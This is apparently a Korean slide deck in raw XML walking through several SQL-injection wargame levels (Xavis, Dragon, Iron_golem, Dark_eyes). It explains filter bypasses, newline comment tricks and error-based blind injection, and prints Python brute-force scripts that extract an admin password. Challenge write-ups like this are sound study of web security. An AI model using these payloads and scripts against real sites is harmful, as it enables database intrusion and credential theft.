              <a:t>함수로 답을 출력하였다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31BDD0-EAF0-4643-93AA-B8DBAE023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0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="174171" y="4289073"/>
            <a:ext cx="8115300" cy="21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6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F2BBA-FF9D-4B62-8D19-554CEF72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475671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"n13druiej3ari8isauekf6su94"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"http://los.rubiya.kr/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw=%27%20or%20id='admin' and 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"http://los.rubiya.kr/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw=%27%20or%20id='admin' and ord(substr(pw,"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"Hello admin"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4FF64-4056-4368-8202-CFB716BF5143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121920" y="4075610"/>
            <a:ext cx="11948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먼저 길이가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>12byte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>인 것을 찾았고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, ord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>결과 대충 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>50000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이상이였다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신</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>)los</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에서는 범위가 너무 크기 때문에 이진 탐색으로 찾아야했다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구</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>)los</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에서도 이진 탐색으로 찾아도 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>유니코드기 때문에 그렇다면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>글자로 이루어진 유니코드가 답일 것이라고 추측할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그래서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 범위를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>0~3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>으로 잡고 찾을 범위중 최댓값을 최대 멀티바이트의 최고 범위인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>65536</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>으로 두었다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>코드의 내용은 처음 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>0~65536</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 중간값인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>32768</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>보다 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>substr(pw,1,1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 값이 더 크다면</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>32768</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>65536</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 중간값을 비교하는 식이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>크거나 작지도 않다면 같은 값을 찾은것이니 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 넣어둔다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6E7E9-7188-4A62-8710-0B87DB2C1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21" y="2855893"/>
            <a:ext cx="7143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A468-87DB-4CCE-AB4D-BA64BBEE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preg_match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>뭘찾을지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>어디서찾을지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>);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7DDD4-AE8F-489A-90C1-A88ED112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351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>preg_match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>('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en-US" altLang="ko-KR"/>
              <a:t>prob</a:t>
            </a:r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/>
              <a:t>_</a:t>
            </a:r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.</a:t>
            </a:r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(</a:t>
            </a:r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)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en-US" altLang="ko-KR" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>', $_GET[id])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en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>구분자로서의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 역할을 하고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>#, +, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>등으로 대체될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>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 특수문자의 효과를 무시하고 문자자체로 취급</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>최종적으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>prob _ . () </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에서 대소문자 구분없이 찾겠다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23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20166-0048-4618-9214-CB93CB20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Dragon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E1819-854A-4F1D-A4B4-84716A51A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9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53C4210-FDC5-44DF-9CA9-0B6B0EAB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" y="180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prob_dragon where id='guest'#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4C20A0-3855-46DE-A728-A5C7EBCB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" y="-230278"/>
            <a:ext cx="1163955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Hello guest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prob_dragon where id='guest'#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"&lt;h2&gt;Hello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'admin'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"dragon"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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>는 한줄 주석처리이다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그래서 라인피드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>엔터</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>를 나타내는 문자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pw=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0x0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>를 써주면</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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query : 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select id from prob_dragon where id='guest'# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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 pw=''</a:t>
            </a:r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에서 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query : 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select id from prob_dragon where id='guest'# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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 pw='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'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1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 된다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</a:rPr>
              <a:t>그럼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id=guest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조건이 사라졌으니 새로운 조건을 넣어주고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id=‘admin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 뽑아내면 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0x0a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and pw=‘’ or id=‘admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 넣어주면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00000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>query : 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select id from prob_dragon where id='guest'# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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 pw=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‘</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1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0x0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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and pw=‘’ or id=‘admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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이 돼서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id=‘guest’ and pw=‘’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>은 거짓이고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id=‘admin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>은 참이므로 성공이다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lang="ko-KR" altLang="ko-KR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96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70772-6C73-42E1-A423-0E90B0C83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Iron_golem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DFA51-BB8C-4FE2-9FBE-BF9BE017D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47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8A8AC1A-9B5E-4716-A058-422BAC17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" y="2199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prob_iron_golem where id='admin'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B1D850-0CD9-4C32-B5E8-D461E58E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4" y="219919"/>
            <a:ext cx="1223924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'/sleep|benchmark/i'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prob_iron_golem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prob_iron_golem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"iron_golem"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sleep()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>과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benchmark()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>함수를 막은거 봐선 응답시간을 기준으로 참을 판단하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>time based blind injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>은 할 수 없고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0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그동안은 없었던 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if(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mysql_error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()) exit(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mysql_error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());</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="007700"/>
                </a:solidFill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은 문법오류가 났을 경우 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>를 출력해주겠다는 것이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial Unicode MS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 힌트는 에러메세지를 기반으로 원하는 정보를 유추하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>error based blind injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 이용하라는 것이다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02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CBF602-7505-4029-B176-70024CEA6750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152399" y="-126418"/>
            <a:ext cx="11887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pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>파라미터에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' or id='admin' and if(substr(pw,1,1)='a'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(select 1 union select 2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0)--%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 넣어주는데</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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뜻은 만약 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>의 첫 글자가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‘a’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>라면</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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(select 1 union select 2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>라는 쿼리 안의 쿼리문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>서브쿼리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>를 실행시켜주고 거짓이라면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>을 리턴한다는 것이다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이 때 참일 경우 서브쿼리의 결과가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>줄 이상이여서 문법상 오류가 나온다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가장 먼저 길이를 찾고 파이썬을 이용해서 알아낸다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CA8056-A92C-4A23-8744-92DA18DA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429000"/>
            <a:ext cx="11991975" cy="8191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FBC7DF2-6866-4C37-8CC9-F65C069F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01" y="4348596"/>
            <a:ext cx="936025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urllib2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"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$^&amp;*()-_+"</a:t>
            </a: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16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url=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"https://los.eagle-jump.org/iron_golem_d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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8.php?pw=' or id='admin' and if(substr(pw,"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>
                <a:solidFill>
                  <a:srgbClr val="8888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(i)+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",1)='"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"',(select 1 union select 2),0)--%20"</a:t>
            </a:r>
            <a:b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req=urllib2.Request(url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>
                <a:solidFill>
                  <a:srgbClr val="AA492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headers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'User-Agent'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'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'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req.add_header(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"Cookie"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"PHPSESSID=9avd2i6ki343tn4pkaui1tl800"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urllib2.urlopen(req).read().find(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="90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"Subquery returns more than 1 row"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!= -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="90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result = result + wordlist[j]</a:t>
            </a:r>
            <a:b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lang="ko-KR" altLang="ko-KR" sz="90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lang="ko-KR" altLang="ko-KR"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743447-6D9B-4C4B-9052-8F9610D8F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3" y="1728354"/>
            <a:ext cx="7896225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53BA27-19A8-4488-8368-70E0DA407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91" y="1937904"/>
            <a:ext cx="2819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5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E637CA-60E4-4DDC-81F0-7260C65D220F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="87085" y="163175"/>
            <a:ext cx="1201782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http://los.rubiya.kr/iron_golem_b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t>5.php?pw=' or id='admin' and if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LENGTH(pw)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=68</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t>,pw=(select 1 union select 2),0)--%20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t>&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t>참</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>68</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>바이트이기 때문에 만약 유니코드라면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>17</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>자리이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 그래서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>0~17</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>까지로 잡아주고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Xavis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>와 같이 푼다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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F5DD8E-0DA1-4082-A855-7031C4E6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" y="1029765"/>
            <a:ext cx="9244838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"rectoloia8cmiiu5udml2cpnj5"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"http://los.rubiya.kr/iron_golem_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5.php?pw=' or id='admin' and if(ord(substr(pw,"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",(select 1 union select 2),0)--%20"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"Subquery returns more than 1 row"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"http://los.rubiya.kr/iron_golem_b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5.php?pw=' or id='admin' and if(ord(substr(pw,"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",(select 1 union select 2),0)--%20"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"Subquery returns more than 1 row"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17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61ED64-7660-421D-9A37-89C529447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4930833"/>
            <a:ext cx="8848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1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3404C-B680-4D0B-AF8B-FB5F2D034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Dark_eyes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D46FAF-670F-414D-B1D9-58860FADB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40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9256E-D52C-489E-8BE7-DB14AC5C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" y="2351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 from prob_dark_eyes where id='admin' and pw=''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0EC55-AA1C-46D8-92B7-D239AAA6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" y="0"/>
            <a:ext cx="11408892" cy="69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'/prob|_|\.|\(\)/i'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'/col|if|case|when|sleep|benchmark/i'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"HeHe"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 from prob_dark_eyes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mysql_error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()) exit();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"&lt;hr&gt;query : &lt;strong&gt;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&lt;/strong&gt;&lt;hr&gt;&lt;br&gt;"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pw from prob_dark_eyes where id='admin' and pw='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'pw'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"dark_eyes"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조건문 함수들이 모두 막혔기 때문에 전 문제에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>를 빼고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>로 조건을 넣어주었다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>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>그리고 에러메세지가 출력이 되지 않는다는 점이 다르다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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://los.eagle-jump.org/dark_eyes_a~4.php?pw=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' or id='admin' and (select 1 union select 2 where LENGTH(pw)=8)--%20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</a:rPr>
              <a:t>이렇게 하면 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LENGTH=8</a:t>
            </a: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</a:rPr>
              <a:t>일 때 구문오류가 발생하고 아니라면 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select 1 </a:t>
            </a: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</a:rPr>
